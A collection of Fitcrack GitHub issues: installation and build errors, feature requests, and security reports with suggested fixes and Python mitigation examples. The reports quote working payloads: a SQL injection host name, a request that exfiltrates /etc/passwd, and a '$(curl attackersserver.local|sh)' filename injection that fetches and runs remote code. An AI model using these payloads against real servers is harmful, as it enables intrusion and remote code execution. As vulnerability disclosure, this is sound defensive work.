<device_3_speed>2206843</device_3_speed>
<device_3_temp>34</device_3_temp>
<device_3_util>0</device_3_util>
<device_4_name>Intel(R) UHD Graphics 630</device_4_name>
<device_4_type>GPU</device_4_type>
<device_4_speed>178581</device_4_speed>
<device_4_temp>-1</device_4_temp>
<device_4_util>-1</device_4_util>
Succesfully parsed workunit_name: fitcrack_1654952461_0
fc_workunit_id: 0
Succesfully parsed progress: 0
Succesfully parsed total speed: 5030128
Updating workunit progress...
Updating workunit speed...
fc_device_id 1
Inserting data to fc_device_info...
fc_device_id 2
Inserting data to fc_device_info...
fc_device_id 3
Inserting data to fc_device_info...
Database error: Out of range value for column 'temperature' at row 1
query=INSERT INTO `fc_device_info` (`device_id`,`workunit_id`,`speed`,`temperature`,`utilization`) VALUES (3, 0, 178581, 18446744073709551615, 18446744073709551615);
Problem with DB query: INSERT INTO `fc_device_info` (`device_id`,`workunit_id`,`speed`,`temperature`,`utilization`) VALUES (3, 0, 178581, 18446744073709551615, 18446744073709551615);
Shutting down now.
These database columns seem to just be signed 32-bit integers, so I think adjusting some types is all that will be necessary to correct this fault.
However, a lot of this code appears like it may be unsafe and possibly vulnerable to SQL injection, for example:
fitcrack/server/src/source/trickler.cpp
Lines 241 to 248 in 83552db
If a host maliciously reports itself with the name foo', ''); ANOTHER_SQL_QUERY_HERE; -- it may be able to perform arbitrary SQL commands against the SQL server leading to security issues.
I would suggest killing two birds with one stone and re-writing some of this to use prepared statements, as these provide more type safety, as well as prevent SQL injection attacks. (https://dev.mysql.com/doc/refman/8.0/en/sql-prepared-statements.html, https://dev.mysql.com/doc/c-api/8.0/en/c-api-prepared-statement-interface.html, https://mariadb.com/kb/en/prepared-statement-examples/).
I would offer to help, however unfortunately neither C++ nor SQL are my strong suits :(.
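The mitigation suggested in the report above, bound parameters plus validation of the sensor readings before they reach the database, as an added example that is not Fitcrack's code. Python's sqlite3 stands in for the MySQL prepared-statement API; the `fc_device` table, the function names and the choice to store an unavailable reading as NULL are assumptions, while the `fc_device_info` columns and the sample values are taken from the log.

```python
import sqlite3

INT32_MAX = 2**31 - 1  # the report describes the columns as signed 32-bit


def as_uint64(value):
    """What a signed value becomes when reinterpreted as unsigned 64-bit."""
    return value & 0xFFFFFFFFFFFFFFFF


def sensor_value(raw):
    """Parse a temperature/utilization field sent by a host.

    Returns an int that fits the column, or None (stored as NULL) when the
    host reports the -1 "unavailable" sentinel, garbage, or an
    out-of-range number.
    """
    try:
        value = int(raw)
    except (TypeError, ValueError):
        return None
    return value if 0 <= value <= INT32_MAX else None


def open_db():
    """In-memory stand-in schema (fc_device is a hypothetical table)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE fc_device (id INTEGER PRIMARY KEY, name TEXT NOT NULL);
        CREATE TABLE fc_device_info (
            device_id INTEGER, workunit_id INTEGER, speed INTEGER,
            temperature INTEGER, utilization INTEGER);
    """)
    return db


def record_device(db, workunit_id, name, speed, temp, util):
    """Store one device report using bound parameters only.

    The host-supplied name is passed as data, never spliced into the SQL
    text, so quotes and semicolons in it have no syntactic meaning.
    """
    cur = db.execute("INSERT INTO fc_device (name) VALUES (?)", (name,))
    device_id = cur.lastrowid
    db.execute(
        "INSERT INTO fc_device_info "
        "(device_id, workunit_id, speed, temperature, utilization) "
        "VALUES (?, ?, ?, ?, ?)",
        (device_id, workunit_id, int(speed), sensor_value(temp), sensor_value(util)),
    )
    return device_id


if __name__ == "__main__":
    # The wrap seen in the failing query: -1 printed as an unsigned 64-bit value.
    print(as_uint64(-1))  # 18446744073709551615
    db = open_db()
    # Values from the trickle message in the report (Intel UHD Graphics 630).
    record_device(db, 0, "Intel(R) UHD Graphics 630", "178581", "-1", "-1")
    # The hostile name quoted in the report, stored verbatim as plain data.
    record_device(db, 0, "foo', ''); ANOTHER_SQL_QUERY_HERE; --", "1", "57", "2")
    for row in db.execute("SELECT d.name, i.temperature, i.utilization "
                          "FROM fc_device d JOIN fc_device_info i ON i.device_id = d.id"):
        print(row)
```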
I have attempted the installation of fitcrack on two different ubuntu 18.04 machines. In both instances, when I try to access http://localhost it appears to start to launch, but fails with a red network error box.
I CAN access localhost/fitcrack to access the user log in, just not the main dashboard.
I reviewed the apache2 error.log, and there are many Traceback errors in relation to flask and 'ImportError: cannot import name 'ContextVar' errors.
Is this error common in the apache2 logs? I'm wondering if there is a relation to the dashboard not launching and these errors?
We set up Fitcrack to test.
How to set up Fitcrack with SSL?
BTW, we always got the following message when visiting the installed Fitcrack:
The server could not verify that you are authorized to access the URL requested. You either supplied the wrong credentials (e.g. a bad password), or your browser doesn't understand how to supply the credentials required.
Due to some requirements I need to deploy Fitcrack on an intranet, without internet. Can you help me?
Hey there,
Cool project, but I can't get it to compile correctly. I answered the configuration questions and started compiling the server.
It says: error: ‘BOINC_MAJOR_VERSION’ was not declared in this scope; did you mean ‘ERR_MAJOR_VERSION’?
For context:
sched_types.cpp: In constructor ‘SCHEDULER_REPLY::SCHEDULER_REPLY()’:
sched_types.cpp:737:11: warning: ‘void* memset(void*, int, size_t)’ clearing an object of type ‘struct HOST’ with no trivial copy-assignment; use assignment or value-initialization instead [-Wclass-memaccess]
737 | memset(&host, 0, sizeof(host));
| ~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~
In file included from ../db/boinc_db.h:40,
from config.h:24,
from sched_types.cpp:20:
../db/boinc_db_types.h:264:8: note: ‘struct HOST’ declared here
264 | struct HOST {
| ^~~~
sched_types.cpp: In member function ‘int SCHEDULER_REPLY::write(FILE*, SCHEDULER_REQUEST&)’:
sched_types.cpp:769:9: error: ‘BOINC_MAJOR_VERSION’ was not declared in this scope; did you mean ‘ERR_MAJOR_VERSION’?
769 | BOINC_MAJOR_VERSION*100+BOINC_MINOR_VERSION
| ^~~~~~~~~~~~~~~~~~~
| ERR_MAJOR_VERSION
sched_types.cpp:769:33: error: ‘BOINC_MINOR_VERSION’ was not declared in this scope; did you mean ‘ERR_MAJOR_VERSION’?
769 | BOINC_MAJOR_VERSION*100+BOINC_MINOR_VERSION
| ^~~~~~~~~~~~~~~~~~~
| ERR_MAJOR_VERSION
sched_types.cpp: In member function ‘int SCHED_DB_RESULT::parse_from_client(XML_PARSER&)’:
sched_types.cpp:1295:11: warning: ‘void* memset(void*, int, size_t)’ clearing an object of type ‘struct SCHED_DB_RESULT’ with no trivial copy-assignment; use assignment or value-initialization instead [-Wclass-memaccess]
1295 | memset(this, 0, sizeof(*this));
| ~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~
In file included from sched_main.h:21,
from sched_types.cpp:33:
sched_types.h:198:8: note: ‘struct SCHED_DB_RESULT’ declared here
198 | struct SCHED_DB_RESULT : DB_RESULT {
| ^~~~~~~~~~~~~~~
make[2]: *** [Makefile:2571: sched_types.o] Error 1
make[2]: Leaving directory '~/tools/fitcrack/boinc/sched'
make[1]: *** [Makefile:680: all-recursive] Error 1
make[1]: Leaving directory '~/tools/fitcrack/boinc'
make: *** [Makefile:584: all] Error 2
Error during compilation.
Is there an updated Dependency list for Ubuntu 20.04?
Getting a bunch of mismatches trying to install
Hey!
I was now able to test the solution and compared to hashtopolis e.g. it has a much better UI feeling. I don't know about performance yet, but your paper states its advantages in this regard as well.
Some observations I made, or features that I miss:
The width of the password file UI is quite small. I think that's a displaying bug, that I could fix on the client side.
Hi, when I upload a PCFG ZIP file and then try to download it, the download fails with "An unhandled exception occurred." message.
This doesn't seem to affect anything else: running a cracking test with the newly uploaded PCFG works fine. It seems that only downloading the file back is broken.
This behaviour does not occur when downloading the default PCFGs or PCFGs generated from dictionaries; only PCFGs uploaded directly through Webadmin exhibit this behaviour.
I can see that the code is trying to look for the path stored in the database.
And in the database, the path is stored as the uploaded filename, including the .zip extension (see row 16).
+----+------------------------------------------+----------------------------------------------+------------------+---------------------+---------+
| id | name | path | keyspace | time_added | deleted |
+----+------------------------------------------+----------------------------------------------+------------------+---------------------+---------+
| 1 | john | john.zip | 1321431161 | 2019-08-30 12:14:53 | 0 |
| 2 | facebook-pastebay | facebook-pastebay.zip | 999 | 2019-08-30 12:15:08 | 0 |
| 3 | twitter-banned | twitter-banned.zip | 1096 | 2019-08-30 12:17:48 | 0 |
| 4 | adobe100 | adobe100 | 163 | 2023-03-21 17:26:27 | 1 |
| 5 | adobe100 | adobe100 | 163 | 2023-03-21 17:26:36 | 1 |
| 6 | adobe100 | adobe100 | 163 | 2023-03-21 17:27:09 | 1 |
| 7 | lmao | lmao | 163 | 2023-03-21 17:29:23 | 1 |
| 8 | lmao | lmao | 163 | 2023-03-21 17:30:27 | 1 |
| 9 | adobe100 | adobe100 | 163 | 2023-03-23 12:38:55 | 1 |
| 10 | adobe100-crlf | adobe100-crlf | 163 | 2023-03-23 12:39:03 | 1 |
| 11 | adobe100-crlf | adobe100-crlf | 163 | 2023-03-23 12:59:09 | 1 |
| 12 | bible | bible | 12570 | 2023-03-23 13:36:01 | 1 |
| 13 | yo_mamma | yo_mamma.zip | 999 | 2023-03-28 11:32:14 | 0 |
| 14 | fc_auto_test_pcfg_correct-20230328125309 | fc_auto_test_pcfg_correct-20230328125309.zip | 999 | 2023-03-28 12:53:51 | 0 |
| 15 | fc_auto_test_pcfg_correct-20230328125754 | fc_auto_test_pcfg_correct-20230328125754.zip | 999 | 2023-03-28 12:59:03 | 0 |
| 16 | fc_auto_test_pcfg_correct-20230328125934 | fc_auto_test_pcfg_correct-20230328125934.zip | 999 | 2023-03-28 13:00:12 | 0 | <=== This is the newly added PCFG; the path has a .zip extension
| 17 | darkweb2017-top1000 | darkweb2017-top1000 | 2924855812155399 | 2023-03-28 14:50:59 | 0 |
+----+------------------------------------------+----------------------------------------------+------------------+---------------------+---------+
But in the /usr/share/collections/pcfg directory (the one the download endpoint refers to), the PCFG is stored as a directory, not a ZIP file.
alpatron@fitcrack:/usr/share/collections/pcfg$ ls -l
total 100
drwxr-xr-x 10 www-data www-data 4096 Mar 28 14:50 darkweb2017-top1000
drwxrwxrwx 10 www-data www-data 4096 Aug 30 2019 facebook-pastebay
-rwxrwxrwx 1 www-data www-data 12300 Aug 30 2019 facebook-pastebay.zip
drwxr-xr-x 10 www-data www-data 4096 Mar 28 12:53 fc_auto_test_pcfg_correct-20230328125309
drwxr-xr-x 10 www-data www-data 4096 Mar 28 12:59 fc_auto_test_pcfg_correct-20230328125754
drwxr-xr-x 10 www-data www-data 4096 Mar 28 13:00 fc_auto_test_pcfg_correct-20230328125934 <=== Uploaded PCFG is stored as directory
drwxr-xr-x 11 www-data www-data 4096 Mar 23 13:49 honeynet
drwxr-xr-x 2 www-data www-data 4096 Mar 28 12:46 image
drwxrwxrwx 10 www-data www-data 4096 Aug 30 2019 john
-rwxrwxrwx 1 www-data www-data 28695 Aug 30 2019 john.zip
drwxrwxrwx 10 www-data www-data 4096 Aug 30 2019 twitter-banned
-rwxrwxrwx 1 www-data www-data 11251 Aug 30 2019 twitter-banned.zip
drwxr-xr-x 10 www-data www-data 4096 Mar 28 11:32 yo_mamma
This mismatch causes the failure of the download endpoint.
Curiously, as I said before, this does not affect cracking jobs; they work just fine even with the database–directory mismatch.
Fitcrack dev build (f2a0232) on Ubuntu 22.04.2
{"message": "An unhandled exception occurred."}
[Tue Mar 28 14:53:19.620925 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] An unhandled exception occurred.
[Tue Mar 28 14:53:19.621001 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] Traceback (most recent call last):
[Tue Mar 28 14:53:19.621020 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1516, in full_dispatch_request
[Tue Mar 28 14:53:19.621039 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] rv = self.dispatch_request()
[Tue Mar 28 14:53:19.621056 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1502, in dispatch_request
[Tue Mar 28 14:53:19.621075 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] return self.ensure_sync(self.view_functions[rule.endpoint])(**req.view_args)
[Tue Mar 28 14:53:19.621093 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/flask_restx/api.py", line 404, in wrapper
[Tue Mar 28 14:53:19.621112 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] resp = resource(*args, **kwargs)
[Tue Mar 28 14:53:19.621128 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/flask/views.py", line 84, in view
[Tue Mar 28 14:53:19.621146 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] return current_app.ensure_sync(self.dispatch_request)(*args, **kwargs)
[Tue Mar 28 14:53:19.621165 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/flask_restx/resource.py", line 46, in dispatch_request
[Tue Mar 28 14:53:19.621184 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] resp = meth(*args, **kwargs)
[Tue Mar 28 14:53:19.621200 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/pcfg/pcfg.py", line 66, in get
[Tue Mar 28 14:53:19.621219 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] return send_file(path, attachment_filename=pcfg.path, as_attachment=True)
[Tue Mar 28 14:53:19.621238 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/flask/helpers.py", line 612, in send_file
[Tue Mar 28 14:53:19.621257 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] return werkzeug.utils.send_file(
[Tue Mar 28 14:53:19.621273 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/werkzeug/utils.py", line 701, in send_file
[Tue Mar 28 14:53:19.621324 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] stat = os.stat(path)
[Tue Mar 28 14:53:19.621342 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] FileNotFoundError: [Errno 2] No such file or directory: '/usr/share/collections/pcfg/fc_auto_test_pcfg_correct-20230328125934.zip'
[Tue Mar 28 14:53:19.622935 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] [2023-03-28 14:53:19,621] ERROR in app: Exception on /pcfg/16 [GET]
[Tue Mar 28 14:53:19.622984 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] Traceback (most recent call last):
[Tue Mar 28 14:53:19.623002 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1516, in full_dispatch_request
[Tue Mar 28 14:53:19.623021 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] rv = self.dispatch_request()
[Tue Mar 28 14:53:19.623037 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/flask/app.py", line 1502, in dispatch_request
[Tue Mar 28 14:53:19.623055 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] return self.ensure_sync(self.view_functions[rule.endpoint])(**req.view_args)
[Tue Mar 28 14:53:19.623073 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/flask_restx/api.py", line 404, in wrapper
[Tue Mar 28 14:53:19.623091 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] resp = resource(*args, **kwargs)
[Tue Mar 28 14:53:19.623107 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/flask/views.py", line 84, in view
[Tue Mar 28 14:53:19.623125 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] return current_app.ensure_sync(self.dispatch_request)(*args, **kwargs)
[Tue Mar 28 14:53:19.623143 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/flask_restx/resource.py", line 46, in dispatch_request
[Tue Mar 28 14:53:19.623161 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] resp = meth(*args, **kwargs)
[Tue Mar 28 14:53:19.623177 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/pcfg/pcfg.py", line 66, in get
[Tue Mar 28 14:53:19.623195 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] return send_file(path, attachment_filename=pcfg.path, as_attachment=True)
[Tue Mar 28 14:53:19.623213 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/flask/helpers.py", line 612, in send_file
[Tue Mar 28 14:53:19.623231 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] return werkzeug.utils.send_file(
[Tue Mar 28 14:53:19.623247 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] File "/usr/local/lib/python3.10/dist-packages/werkzeug/utils.py", line 701, in send_file
[Tue Mar 28 14:53:19.623265 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] stat = os.stat(path)
[Tue Mar 28 14:53:19.623281 2023] [wsgi:error] [pid 981] [remote 192.168.56.1:2150] FileNotFoundError: [Errno 2] No such file or directory: '/usr/share/collections/pcfg/fc_auto_test_pcfg_correct-20230328125934.zip'
Hi. I added 2 hosts:
Could you please help me why it doesn't work with the second multi-GPU host? Both hosts are added using boinccmd tool.
I installed Fitcrack on Ubuntu 18.04 following this guide: https://github.com/nesfit/fitcrack
I can create a job in Webadmin, but when I launch it there is no process.
Please give me instructions for this problem.
Thanks
Hello. I installed Fitcrack manually. Everything seems to work, but in the UI I can see the error
Can not load http://my-ip/fitcrack/server_status.php?xml=1
Do you know how to solve it? Also, I'm not sure how to connect from a headless client, as I keep getting Authorization failure: -155, maybe it is related.
The code responsible for importing dictionaries from /usr/share/collections/import/ is flawed and contains several vulnerabilities.
First, the server does not check that files are constrained to /usr/share/collections/import/, allowing files to be read from anywhere on the system.
POSTing the following to /dictionary/fromFile adds a new dictionary with the contents of /etc/passwd on the server:
{"files":[{"name":"testpasswd.txt","path":"/etc/passwd"}],"sort":false}
The "dictionary" can then be downloaded from the server, exposing the contents of /etc/passwd:
GET /dictionary/13/download HTTP/2
Host: api.fitcrack.local
Cookie: (omitted)
HTTP/2 200 OK
Cache-Control: no-cache
Content-Disposition: attachment; filename=testpasswd_1654943996.txt
Content-Type: text/plain; charset=utf-8
Date: Sat, 11 Jun 2022 10:40:11 GMT
Etag: "1654928242.4268618-1803-3525252685"
Last-Modified: Sat, 11 Jun 2022 06:17:22 GMT
Server: Caddy
Server: Apache/2.4.37 (rocky) mod_wsgi/4.6.4 Python/3.6
Vary: Cookie
Content-Length: 1803
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
The user-supplied filename is not sanitised and is then passed to a shell command context.
POSTing the following to /dictionary/fromFile leads to successful exploitation.
{"files":[{"name":"$(curl attackersserver.local|sh)foobar.txt","path":"test"}],"sort":false}
This will pull down code from attackersserver.local and execute it on the Fitcrack server. For example, a reverse shell can be used to take remote control over the server:
This is partially because Popen is used with shell=True, which is not recommended for security reasons.
fitcrack/webadmin/fitcrackAPI/src/src/api/fitcrack/functions.py
Lines 23 to 35 in 86d5986
def is_safe_path(basedir, path, follow_symlinks=True):
    if follow_symlinks:
        matchpath = os.path.realpath(path)
    else:
        matchpath = os.path.abspath(path)
    return basedir == os.path.commonpath((basedir, matchpath))
To prevent RCE, apply all of the following for defence-in-depth:
shell=True when user-controllable inputs are being passed to the command, unless absolutely necessary.
Examples
Bad, always vulnerable: subprocess.Popen("./foo -a -b " + userInput, shell=True)
Not vulnerable, but not preferred: subprocess.Popen("./foo -a -b " + shlex.quote(userInput), shell=True)
Best, safe: subprocess.Popen(["./foo", "-a", "-b", userInput])
Let me know if you need any more information.
Thanks,
Lachlan
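The two mitigations this report points to, as an added example that is not Fitcrack's code: a containment check that resolves the requested path against the import directory before comparing, and an argument-list process call that delivers an untrusted name to the child verbatim. The names resolve_import_path, argv_seen_by_child and UnsafePath are hypothetical, the child process is a stand-in for whatever tool the server runs, and all sample files are constructed in a temporary directory.

```python
import os
import subprocess
import sys
import tempfile


class UnsafePath(ValueError):
    """The requested import path does not name a file inside the import dir."""


def resolve_import_path(base_dir, requested):
    """Return the real path of `requested` if it is a file under `base_dir`.

    Symlinks are resolved before the comparison, so a link placed inside
    base_dir that points somewhere else is rejected as well.
    """
    base = os.path.realpath(base_dir)
    # os.path.join() discards `base` when `requested` is absolute, which is
    # why the containment test below is still needed after joining.
    candidate = os.path.realpath(os.path.join(base, requested))
    # commonpath() compares whole components: "/x/import-old" is not treated
    # as being inside "/x/import", unlike a str.startswith() check.
    if candidate == base or os.path.commonpath((base, candidate)) != base:
        raise UnsafePath(requested)
    if not os.path.isfile(candidate):
        raise UnsafePath(requested)
    return candidate


def argv_seen_by_child(untrusted_name):
    """Hand `untrusted_name` to a child process as one argv element.

    No shell is involved, so "$(...)" is never expanded. The child (a stand-in
    program, not a Fitcrack tool) writes back the argument it received.
    """
    child = "import sys; sys.stdout.write(sys.argv[1])"
    done = subprocess.run([sys.executable, "-c", child, untrusted_name],
                          capture_output=True, text=True, check=True)
    return done.stdout


def demo():
    """Run both checks on constructed sample input and return the verdicts."""
    verdicts = {}
    with tempfile.TemporaryDirectory() as root:
        import_dir = os.path.join(root, "import")
        sibling = os.path.join(root, "import-old")
        os.mkdir(import_dir)
        os.mkdir(sibling)
        for path in (os.path.join(import_dir, "words.txt"),
                     os.path.join(root, "outside.txt"),
                     os.path.join(sibling, "old.txt")):
            with open(path, "w") as fh:
                fh.write("alpha\nbeta\n")
        os.symlink(os.path.join(root, "outside.txt"),
                   os.path.join(import_dir, "link.txt"))
        samples = {
            "plain": "words.txt",
            "absolute": os.path.join(root, "outside.txt"),
            "dotdot": "../outside.txt",
            "sibling": "../import-old/old.txt",
            "symlink": "link.txt",
        }
        for label, requested in samples.items():
            try:
                resolve_import_path(import_dir, requested)
                verdicts[label] = "accepted"
            except UnsafePath:
                verdicts[label] = "rejected"
    # Constructed, harmless name containing shell command substitution syntax.
    name = "$(echo injected)foobar.txt"
    verdicts["argv"] = argv_seen_by_child(name) == name
    return verdicts


if __name__ == "__main__":
    for label, verdict in demo().items():
        print(label, verdict)
```

The containment check has to run on the resolved path that is later opened, not on the raw request value, otherwise the symlink case slips through.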
Hi, thanks for this software! I'm exploring it as an alternative to Hashtopolis.
I'm wondering if there's functionality to see the current speed of a running task (outside of the benchmark speed in the logs).
Thanks!
Flask is currently configured with a static value for SECRET_KEY. This means that every Fitcrack installation shares the same, known, secret key. This creates a security vulnerability, as this key is (per its name) to be kept secret, as it is used for signing cookies, JWTs, etc.
fitcrack/webadmin/fitcrackAPI/src/app.py
Line 49 in 86d5986
I would suggest that the key should either be stored in a config file, and randomly generated on installation, or, preferably, generated fresh every time the server is started:
import secrets
# .........
flask_app.config['SECRET_KEY'] = secrets.token_hex(16)
Interested in your thoughts :) I'm happy to make a PR once a solution is agreed upon.
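The first option from this issue (a key generated once per installation and kept in a file), as an added example that is not Fitcrack's code. The function name load_or_create_secret_key and the key-file location are hypothetical. A key generated at every start differs between server processes and across restarts, so anything signed by one process fails verification in another; a persisted per-installation key avoids that as long as the file stays private.

```python
import os
import secrets
import stat
import tempfile

KEY_BYTES = 32  # 256-bit key, stored as 64 hex characters


def load_or_create_secret_key(path):
    """Return the hex key stored at `path`, generating it on first use."""
    if not os.path.exists(path):
        # mkstemp() creates the file with mode 0600. The key is written first
        # and then hard-linked into place, so no reader ever sees an empty or
        # partial key file; os.link() fails if another worker got there first.
        fd, tmp = tempfile.mkstemp(dir=os.path.dirname(path) or ".")
        try:
            with os.fdopen(fd, "w") as fh:
                fh.write(secrets.token_hex(KEY_BYTES))
            try:
                os.link(tmp, path)
            except FileExistsError:
                pass  # lost the race; use the key the other worker wrote
        finally:
            os.unlink(tmp)
    # Refuse a key file that group or other users can read or write.
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & 0o077:
        raise PermissionError(f"{path} has loose permissions: {oct(mode)}")
    with open(path) as fh:
        key = fh.read().strip()
    if len(key) < 2 * KEY_BYTES:
        raise ValueError(f"{path} holds a key shorter than {KEY_BYTES} bytes")
    return key


def demo():
    """Exercise the loader in a temporary directory (constructed scenario)."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        path = os.path.join(root, "secret_key")
        first = load_or_create_secret_key(path)    # first start: key created
        second = load_or_create_secret_key(path)   # later start or other worker
        results["stable"] = first == second
        results["hex_chars"] = len(first)
        results["mode"] = oct(stat.S_IMODE(os.stat(path).st_mode))
        os.chmod(path, 0o644)                      # simulate a misconfiguration
        try:
            load_or_create_secret_key(path)
            results["loose_mode"] = "accepted"
        except PermissionError:
            results["loose_mode"] = "rejected"
    # Two independently generated per-start keys never match each other.
    results["per_start_keys_differ"] = (
        secrets.token_hex(16) != secrets.token_hex(16))
    return results


if __name__ == "__main__":
    print(demo())
```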
Sorry for noob question.
So, I installed Fitcrack via the README (using Debian 9 for the best experience with the tutorial). But after installing, my systemd service for Fitcrack always crashed with an error. I tried to start Fitcrack manually and always see this error:
boincadm@debian:~/projects/fitcrack$ ./bin/start
Traceback (most recent call last):
File "./bin/start", line 757, in <module>
config = configxml.ConfigFile(config_filename).read()
File "/home/boincadm/projects/fitcrack/py/Boinc/boincxml.py", line 138, in read
raise Exception("%s: Couldn't get elements from XML file")
Exception: %s: Couldn't get elements from XML file
config.xml is not included by default and I cannot find an example of it. Please give me a way to troubleshoot this.
In the -h output of ./bin/start I see
--config-file= Use specified file instead of program-path/../config.xml
But what does program-path/../config.xml mean? If it's /home/boincadm/projects/fitcrack or /home/boincadm/projects/, these folders do not contain a file with that name.
I've forked this repository and updated the BOINC server to be able to run fitcrack with MySQL 8+. However, after overcoming a lot of errors, I've come to a dead end. The frontend and backend are working fine, but I can't connect to the BOINC server. When using BOINC Manager, I get an error while registering an account. Trying it with boinccmd, the registration goes fine, and the project shows up in the manager, but it says "No jobs to process", and I can't see it in the host list from the dashboard. I've looked at apache's access.log, but other than the register GET request, no other requests are being made. Can I get some help?
EDIT: I'm using Ubuntu 20.04 LTS, and actually, some of the backend stuff is broken too, like resource usage monitoring. My current setup is at http://178.250.159.53/
Hello all,
During some of our testing I have noticed that we are actually completing fragment jobs with the Weakpass 3a dictionary faster than the work generator can actually make the job for clients. Is there anything we can do to speed up the work generator? Looking at htop and glances, it appears that it only uses 1 CPU thread. Can this be changed?
Is it possible that all new hosts automatically get a started job?
Or do I have to add the host manually always?
thx
Hi. When installing Fitcrack on Ubuntu 20 with Docker, Fitcrack fails to start the backend, giving a 500 Apache error when trying to access port
backend error log:
[wsgi:error] mod_wsgi (pid=687): Failed to exec Python script file '/var/www/html/fitcrackAPI/src/wsgi.py'.
[wsgi:error] mod_wsgi (pid=687): Exception occurred processing WSGI script '/var/www/html/fitcrackAPI/src/wsgi.py'.
[wsgi:error] Traceback (most recent call last):
[wsgi:error] File "/var/www/html/fitcrackAPI/src/wsgi.py", line 12, in <module>
[wsgi:error] from app import app as application
[wsgi:error] File "/var/www/html/fitcrackAPI/src/app.py", line 16, in <module>
[wsgi:error] from src.api.fitcrack.endpoints.chart.chart import ns as chart_namespace
[wsgi:error] File "/var/www/html/fitcrackAPI/src/src/api/fitcrack/endpoints/chart/chart.py", line 13, in <module>
[wsgi:error] from src.database import db
[wsgi:error] File "/var/www/html/fitcrackAPI/src/src/database/__init__.py", line 8, in <module>
[wsgi:error] db = SQLAlchemy()
[wsgi:error] File "/usr/local/lib/python3.10/dist-packages/flask_sqlalchemy/__init__.py", line 754, in __init__
[wsgi:error] _include_sqlalchemy(self, query_class)
[wsgi:error] File "/usr/local/lib/python3.10/dist-packages/flask_sqlalchemy/__init__.py", line 108, in _include_sqlalchemy
[wsgi:error] for key in module.__all__:
[wsgi:error] AttributeError: module 'sqlalchemy' has no attribute '__all__'
When running a large keyspace across 20+ systems I have noticed that a lot of hosts start producing "computation error", which then stops the job completing.
For example, I hashed "password" into NTLM, then set up a bruteforce; clients start failing at 95% at keyspace 95.
The bruteforce was done from 1-8 length special/upper/lower/number (?a) with 3D markov and without markov.
The client log says "invalid hex character detected in mask"
Hi!
We're currently evaluating distributed cracking software for a new password cracking cluster we are building.
We really like almost everything Fitcrack has to offer, however we're running into a massive network bottleneck for dictionary based attacks.
We use 100GB+ dictionaries, and only have 1gbps networking between the 3 nodes. Because of this, we are estimating that the chunking method used by Fitcrack will massively bottleneck our performance, especially for algorithms like NTLM where we might have >500GH/s per node.
Would it be possible to implement an option to store a full copy of the dictionary on every worker, and perform the chunking on the workers, similar to how hashtopolis works? This would be a game changer for us and put Fitcrack back on the table as a viable option.
Thanks
🙏
An additional question/feature request (as I have not seen it yet) - is it possible to add extra parameters to hosts, e.g. for a dedicated server, -w 4, or for a home user's machine, maybe -w 2, and things like that?
